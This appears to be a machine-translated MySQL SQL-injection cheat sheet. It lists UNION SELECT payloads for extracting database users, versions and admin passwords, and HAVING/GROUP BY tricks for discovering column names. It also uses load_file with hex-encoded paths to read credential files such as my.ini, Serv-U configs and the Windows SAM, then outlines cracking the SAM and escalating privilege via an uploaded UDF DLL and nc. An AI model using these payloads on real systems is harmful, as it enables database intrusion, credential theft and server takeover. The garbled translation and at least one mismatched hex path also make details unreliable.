MySQL injection Summary

And 1 = 2 Union all select 1, 2, 3, user ()
And 1 = 2 Union all select 1, 2, 3, version ()
And 1 = 2 Union all select 1, 2, 3, database ()
And 1 = 2 Union all select 1, 2, 3, load_file (0x file path)
And 1 = 2 Union all select 1, 2, 3, password from Admin
And 1 = 2 Union all select 1, 2, 3, user from mysql. User

The above password is the field Name Admin is the table name, but we do not know the name and field name of the data table during the union operation, so let's take a look at if the field name is violent.

Brute-force field names are read by the infomation library in Versions later than 5.0, but versions earlier than 5.0 do not have an information library, so having is generally used, the relationship between having and group by is similar to the relationship between where and select. Where is the select condition, and having is the filtering condition of group.

Select * From tb_test having 1 = 1 an error is returned. The error contains the name of the first field.
Select * From tb_test group by ID having 1 = 1 the system will return the name of the second field in the error code, and then try out all the field names in sequence.

MySQL has a load_file function that is very useful, but the current connection must be root.
Usage: load_file (hexadecimal format of the 0x path string). Below are some commonly used sensitive files.
Load_file (0x633a2f77696e646f77732f6d792e696e69) C:/Windows/My. ini winmyadmin1.1 uses clear text to save the user name and password.
Load_file (0x633a2f77696e646f77732f7068702e696e69) C:/Windows/PHP. ini view PHP version information
Load_file (0x633a2f626f6f742e696e69) C:/boot. ini view operating system information

There are also some sensitive information:
C:/winnt/PHP. ini
C:/winnt/My. ini
C: \ mysql \ data \ mysql \ User. MYD // store the database connection password in the mysql. User table
C: \ Program Files \ rhinosoft.com \ Serv-U \ servudaemon. ini // stores the web site path and password of the VM.
C: \ Program Files \ Serv-U \ servudaemon. ini
C: \ windows \ system32 \ inetsrv \ metabase. xml // IIS configuration file
C: \ windows \ repair \ SAM // stores the password for the first installation of windows.
C: \ Program Files \ Serv-U \ servuadmin.exe // the password of the Serv-U administrator earlier than 6.0 is stored here
C: \ Program Files \ rhinosoft.com \ servudaemon.exe
C: \ Documents and Settings \ All Users \ Application Data \ symantec \ pcAnywhere \ *. CIF File
// Stores the pcAnywhere Login Password
C: \ Program Files \ apache group \ apache \ conf \ httpd. conf or c: \ apache \ conf \ httpd. conf // view the Apache file in Windows
C:/resin-3.0.14/CONF/resin. conf // view the resin file configuration of the website developed by JSP.
C:/resin/CONF/resin. CONF/usr/local/resin/CONF/resin. conf
D: \ apache \ apache2 \ conf \ httpd. conf
C: \ Program Files \ mysql \ My. ini
C: \ windows \ system32 \ inetsrv \ metabase. xml view IIS Virtual Host Configuration
C: \ mysql \ data \ mysql \ User. MYD has a user password in the MySQL system.

Use the hex function to convert binary files such as Sam, for example:
Select 1, 2, 3, Hex (load_file (0x633a5c77696e646f77735c4175706169725c73616d ))
Copy the hex content, open hex_workshop, use the special paste method, and save it as a HEX file. Then, you can get the server's Sam file, and then open LC5 (we recommend that you read the hex_workshop) run the password.

In addition, the index can be read after the web path is exposed. PHP content, and then find config. PHP, through config. PHP reads the account and password of the MySQL database, and then uploads the file: mix. DLL my_udf.dll and NC are used for Elevation of Privilege.